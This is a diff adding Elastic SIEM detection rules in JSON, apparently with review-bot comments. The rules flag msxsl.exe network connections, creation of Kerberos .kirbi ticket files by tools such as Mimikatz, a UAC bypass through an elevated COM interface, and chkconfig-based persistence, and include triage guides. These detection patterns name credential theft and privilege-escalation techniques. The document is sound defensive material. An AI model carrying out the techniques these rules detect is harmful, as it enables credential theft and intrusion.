true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "b83a7e96-2eb3-4edf-8346-427b6858d3bd", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom 
ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1552", + "name": "Unsecured Credentials", + "reference": "https://attack.mitre.org/techniques/T1552/", + "subtechnique": [ + { + "id": "T1552.004", + "name": "Private Keys", + "reference": "https://attack.mitre.org/techniques/T1552/004/" + } + ] + }, + { + "id": "T1555", + "name": "Credentials from Password Stores", + "reference": "https://attack.mitre.org/techniques/T1555/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "b83a7e96-2eb3-4edf-8346-427b6858d3bd_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b86afe07-0d98-4738-b15d-8d7465f95ff5_105.json b/packages/security_detection_engine/kibana/security_rule/b86afe07-0d98-4738-b15d-8d7465f95ff5_105.json new file mode 100644 index 00000000000..80ef7199cff --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b86afe07-0d98-4738-b15d-8d7465f95ff5_105.json 
@@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies msxsl.exe making a network connection. This may indicate adversarial activity as msxsl.exe is often leveraged by adversaries to execute malicious scripts and evade detection.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Network Connection via MsXsl", + "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and process.name : \"msxsl.exe\" and event.type == \"start\"]\n [network where host.os.type == \"windows\" and process.name : \"msxsl.exe\" and\n not cidrmatch(destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\",\n \"192.0.0.0/29\", \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\", \"192.0.0.171/32\",\n \"192.0.2.0/24\", \"192.31.196.0/24\", \"192.52.193.0/24\", \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\",\n \"100.64.0.0/10\", \"192.175.48.0/24\",\"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\",\n \"FE80::/10\", \"FF00::/8\")]\n", + "references": [ + "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "b86afe07-0d98-4738-b15d-8d7465f95ff5", + "severity": "low", + "tags": [ + 
"Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1220", + "name": "XSL Script Processing", + "reference": "https://attack.mitre.org/techniques/T1220/" + } + ] + } + ], + "type": "eql", + "version": 105 + }, + "id": "b86afe07-0d98-4738-b15d-8d7465f95ff5_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b8f8da2d-a9dc-48c0-90e4-955c0aa1259a_3.json b/packages/security_detection_engine/kibana/security_rule/b8f8da2d-a9dc-48c0-90e4-955c0aa1259a_3.json new file mode 100644 index 00000000000..c6d3f93bdc9 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b8f8da2d-a9dc-48c0-90e4-955c0aa1259a_3.json 
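Review bot: This rule sets no `timestamp_override`, whereas the neighbouring EQL rules in this diff carry `"timestamp_override": "event.ingested"`; with `"from": "now-9m"` an endpoint event indexed more than about nine minutes after its `@timestamp` would likely fall outside the query window and the sequence would never match. Adding `"timestamp_override": "event.ingested"` (together with the `setup` guidance the sibling rules include) would close that gap, assuming the listed indices populate `event.ingested`. Separately, `"192.0.0.0/29"` is already covered by `"192.0.0.0/24"` in the `cidrmatch` list, so the narrower entry is redundant, though harmless.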
@@ -0,0 +1,77 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation of .kirbi files. The creation of this kind of file is an indicator of an attacker running Kerberos ticket dump utilities, such as Mimikatz, and precedes attacks such as Pass-The-Ticket (PTT), which allows the attacker to impersonate users using Kerberos tickets.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "interval": "60m", + "language": "eql", + "license": "Elastic License v2", + "name": "Kirbi File Creation", + "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and file.extension : \"kirbi\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "b8f8da2d-a9dc-48c0-90e4-955c0aa1259a", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/" + }, + { + "id": "T1558", + "name": "Steal or Forge Kerberos Tickets", + "reference": "https://attack.mitre.org/techniques/T1558/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "b8f8da2d-a9dc-48c0-90e4-955c0aa1259a_3", + "type": "security-rule" +} \ No newline at end of file 
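Review bot: `"interval": "60m"` combined with `"from": "now-9m"` makes each run look back only nine minutes while runs are an hour apart, so creation events timestamped between roughly 9 and 60 minutes before a run would never be evaluated (unless the scheduler widens the window, which cannot be confirmed from this file). The look-back should at least span the interval plus an ingest-lag margin, e.g. `"from": "now-69m"`, or the interval should be dropped so the default schedule with `now-9m` applies. The same interval/from pair appears in the `_4` and `_5` versions of this rule later in the diff. These JSON files appear to be exported from the upstream rule source, so the correction belongs there rather than in this package alone.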
diff --git a/packages/security_detection_engine/kibana/security_rule/b8f8da2d-a9dc-48c0-90e4-955c0aa1259a_4.json b/packages/security_detection_engine/kibana/security_rule/b8f8da2d-a9dc-48c0-90e4-955c0aa1259a_4.json new file mode 100644 index 00000000000..f5da64afb13 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b8f8da2d-a9dc-48c0-90e4-955c0aa1259a_4.json 
@@ -0,0 +1,79 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation of .kirbi files. The creation of this kind of file is an indicator of an attacker running Kerberos ticket dump utilities, such as Mimikatz, and precedes attacks such as Pass-The-Ticket (PTT), which allows the attacker to impersonate users using Kerberos tickets.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*" + ], + "interval": "60m", + "language": "eql", + "license": "Elastic License v2", + "name": "Kirbi File Creation", + "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and file.extension : \"kirbi\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "b8f8da2d-a9dc-48c0-90e4-955c0aa1259a", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/" + }, + { + "id": "T1558", + "name": "Steal or Forge Kerberos Tickets", + "reference": "https://attack.mitre.org/techniques/T1558/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 4 + }, + "id": "b8f8da2d-a9dc-48c0-90e4-955c0aa1259a_4", + "type": "security-rule" +} \ No newline at end of file 
diff --git a/packages/security_detection_engine/kibana/security_rule/b8f8da2d-a9dc-48c0-90e4-955c0aa1259a_5.json b/packages/security_detection_engine/kibana/security_rule/b8f8da2d-a9dc-48c0-90e4-955c0aa1259a_5.json new file mode 100644 index 00000000000..a165e490441 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b8f8da2d-a9dc-48c0-90e4-955c0aa1259a_5.json 
@@ -0,0 +1,79 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation of .kirbi files. The creation of this kind of file is an indicator of an attacker running Kerberos ticket dump utilities, such as Mimikatz, and precedes attacks such as Pass-The-Ticket (PTT), which allows the attacker to impersonate users using Kerberos tickets.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.file-*", + "logs-windows.sysmon_operational-*" + ], + "interval": "60m", + "language": "eql", + "license": "Elastic License v2", + "name": "Kirbi File Creation", + "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and file.extension : \"kirbi\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "b8f8da2d-a9dc-48c0-90e4-955c0aa1259a", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/" + }, + { + "id": "T1558", + "name": "Steal or Forge Kerberos Tickets", + "reference": "https://attack.mitre.org/techniques/T1558/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 5 + }, + "id": "b8f8da2d-a9dc-48c0-90e4-955c0aa1259a_5", + "type": "security-rule" +} \ No newline at end of file 
diff --git a/packages/security_detection_engine/kibana/security_rule/b90cdde7-7e0d-4359-8bf0-2c112ce2008a_108.json b/packages/security_detection_engine/kibana/security_rule/b90cdde7-7e0d-4359-8bf0-2c112ce2008a_108.json new file mode 100644 index 00000000000..2950f2d8ad1 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b90cdde7-7e0d-4359-8bf0-2c112ce2008a_108.json 
@@ -0,0 +1,152 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to bypass User Account Control (UAC) by abusing an elevated COM Interface to launch a rogue Windows ClipUp program. Attackers may attempt to bypass UAC to stealthily execute code with elevated permissions.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "UAC Bypass Attempt with IEditionUpgradeManager Elevated COM Interface", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"Clipup.exe\" and\n not process.executable : \"C:\\\\Windows\\\\System32\\\\ClipUp.exe\" and process.parent.name : \"dllhost.exe\" and\n /* CLSID of the Elevated COM Interface IEditionUpgradeManager */\n process.parent.args : \"/Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}\"\n", + "references": [ + "https://github.com/hfiref0x/UACME" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "b90cdde7-7e0d-4359-8bf0-2c112ce2008a", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need 
to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1559", + "name": "Inter-Process Communication", + "reference": "https://attack.mitre.org/techniques/T1559/", + "subtechnique": [ + { + "id": "T1559.001", + "name": "Component Object Model", + "reference": "https://attack.mitre.org/techniques/T1559/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": 
"eql", + "version": 108 + }, + "id": "b90cdde7-7e0d-4359-8bf0-2c112ce2008a_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b90cdde7-7e0d-4359-8bf0-2c112ce2008a_109.json b/packages/security_detection_engine/kibana/security_rule/b90cdde7-7e0d-4359-8bf0-2c112ce2008a_109.json new file mode 100644 index 00000000000..81fd51fdeac --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b90cdde7-7e0d-4359-8bf0-2c112ce2008a_109.json 
@@ -0,0 +1,152 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to bypass User Account Control (UAC) by abusing an elevated COM Interface to launch a rogue Windows ClipUp program. Attackers may attempt to bypass UAC to stealthily execute code with elevated permissions.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "UAC Bypass Attempt with IEditionUpgradeManager Elevated COM Interface", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"Clipup.exe\" and\n not process.executable : \"C:\\\\Windows\\\\System32\\\\ClipUp.exe\" and process.parent.name : \"dllhost.exe\" and\n /* CLSID of the Elevated COM Interface IEditionUpgradeManager */\n process.parent.args : \"/Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}\"\n", + "references": [ + "https://github.com/hfiref0x/UACME" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "b90cdde7-7e0d-4359-8bf0-2c112ce2008a", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users 
will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1559", + "name": "Inter-Process Communication", + "reference": "https://attack.mitre.org/techniques/T1559/", + "subtechnique": [ + { + "id": "T1559.001", + "name": "Component Object Model", + "reference": "https://attack.mitre.org/techniques/T1559/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + 
"type": "eql", + "version": 109 + }, + "id": "b90cdde7-7e0d-4359-8bf0-2c112ce2008a_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b910f25a-2d44-47f2-a873-aabdc0d355e6_111.json b/packages/security_detection_engine/kibana/security_rule/b910f25a-2d44-47f2-a873-aabdc0d355e6_111.json new file mode 100644 index 00000000000..1b49dfa371a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b910f25a-2d44-47f2-a873-aabdc0d355e6_111.json 
@@ -0,0 +1,101 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the use of the chkconfig binary to manually add a service for management by chkconfig. Threat actors may utilize this technique to maintain persistence on a system. When a new service is added, chkconfig ensures that the service has either a start or a kill entry in every runlevel and when the system is rebooted the service file added will run providing long-term persistence.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Chkconfig Service Add", + "note": "## Triage and analysis\n\n### Investigating Chkconfig Service Add\nService files are configuration files in Linux systems used to define and manage system services. The `Chkconfig` binary can be used to manually add, delete or modify a service. \n\nMalicious actors can leverage services to achieve persistence by creating or modifying service files to execute malicious commands or payloads during system startup. This allows them to maintain unauthorized access, execute additional malicious activities, or evade detection.\n\nThis rule monitors the usage of the `chkconfig` binary to manually add a service for management by `chkconfig`, potentially indicating the creation of a persistence mechanism.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the service that was created or modified.\n- Investigate the currently enabled system services through the following commands `sudo chkconfig --list | grep on` and `sudo systemctl list-unit-files`.\n- Investigate the status of potentially suspicious services through the `chkconfig --list service_name` command. \n- Search for the `rc.d` or `init.d` service files that were created or modified, and analyze their contents.\n- Investigate whether any other files in any of the available `rc.d` or `init.d` directories have been altered through OSQuery.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/init.d/%' OR path LIKE '/etc/rc%.d/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/init.d/%' OR path LIKE '/etc/rc%.d/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate syslog through the `sudo cat /var/log/syslog | grep 'LSB'` command to find traces of the LSB header of the script (if present). If syslog is being ingested into Elasticsearch, the same can be accomplished through Kibana.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n- Investigate abnormal behaviors by the subject process/user such as network connections, file modifications, and any other spawned child processes.\n - Investigate listening ports and open sockets to look for potential command and control traffic or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, 
remote_port, socket, state FROM process_open_sockets\"}}\n - Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses the `chkconfig` binary for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Suspicious File Creation in /etc for Persistence - 1c84dd64-7e6c-4bad-ac73-a5014ee37042\n- Potential Persistence Through Run Control Detected - 0f4d35e4-925e-4959-ab24-911be207ee6f\n- Potential Persistence Through init.d Detected - 474fd20e-14cc-49c5-8160-d9ab4ba16c8b\n- New Systemd Timer Created - 7fb500fa-8e24-4bd1-9480-2a819352602c\n- New Systemd Service Created by Previously Unknown Process - 17b0a495-4d9f-414c-8ad0-92f018b8e001\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service/timer or restore its original configuration.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\") and\n( \n (process.executable : \"/usr/sbin/chkconfig\" and process.args : \"--add\") or\n (process.args : \"*chkconfig\" and process.args : \"--add\")\n) and \nnot process.parent.name in (\"rpm\", \"qualys-scan-util\", \"qualys-cloud-agent\", \"update-alternatives\") and\nnot process.parent.args : (\"/var/tmp/rpm*\", \"/var/lib/waagent/*\")\n", + "references": [ + "https://www.intezer.com/blog/research/lightning-framework-new-linux-threat/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "b910f25a-2d44-47f2-a873-aabdc0d355e6", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
